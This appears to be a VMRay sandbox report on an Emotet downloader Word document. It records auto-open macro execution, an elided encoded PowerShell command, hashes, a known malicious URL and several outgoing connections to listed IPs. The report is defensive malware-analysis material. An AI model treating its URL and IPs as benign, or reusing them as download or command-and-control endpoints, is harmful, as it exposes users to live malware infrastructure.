2d2fa291...85b4 | VMRay Analyzer Report
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader

emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc

Word Document

Created at 2019-04-14T14:36:00

VMRay Threat Indicators (13 rules, 26 matches)

Severity | Category | Operation | Classification
5/5 | Local AV | Malicious content was detected by heuristic scan | -
  • Local AV match on Sample File for "C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc".
5/5 | File System | Known malicious file | Downloader
  • File "C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" is a known malicious file.
4/5 | Process | Tries to create process | -
  • Creates process "powershell -e [encoded command elided]".
4/5 | Network | Reads network adapter information | -
4/5 | Network | Associated with known malicious/suspicious URLs | -
  • URL "nieuwhoftegelwerken.nl/g9A/Wj/" is known as a malicious URL.
3/5 | Network | Performs DNS request | -
3/5 | Network | Connects to remote host | -
  • Outgoing TCP connection to host "195.8.208.98:80".
  • Outgoing TCP connection to host "104.31.93.251:443".
  • Outgoing TCP connection to host "80.172.234.15:80".
  • Outgoing TCP connection to host "192.115.76.18:80".
  • Outgoing TCP connection to host "47.89.211.238:443".
  • Outgoing TCP connection to host "194.8.30.20:80".
2/5 | Network | Connects to HTTP server | -
2/5 | VBA Macro | Executes macro on specific worksheet event | -
  • Executes macro automatically on target "auto" and event "open".
1/5 | Process | Creates system object | -
  • Creates mutex with name "Global\.net clr networking".
1/5 | Static | Unparsable sections in file | -
  • Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc.
1/5 | VBA Macro | Contains Office macro | -

Screenshots

Monitored Processes

Sample Information

ID #594823
MD5 e9ef35217d83597d41a528a7bfd07847
SHA1 8f14fa07250aa12b4876ef055df604b40fdbf992
SHA256 2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4
SSDeep 6144:X77HUUUUUUUUUUUUUUUUUUUT52VYl2ZGP+ZQttKcA:X77HUUUUUUUUUUUUUUUUUUUTCYl2yA4S
Filename emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc
File Size 219.12 KB
Sample Type Word Document
Has VBA Macros True

Analysis Information

Creation Time 2019-04-14 16:36 (UTC+2)
Analysis Duration 00:05:09
Number of Monitored Processes 4
Execution Successful True
Reputation Enabled True
WHOIS Enabled True
Local AV Enabled True
YARA Enabled True
Number of AV Matches 1
Number of YARA Matches 0
Termination Reason Timeout
Tags
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.

Screenshot panels (Before, After): images not reproduced.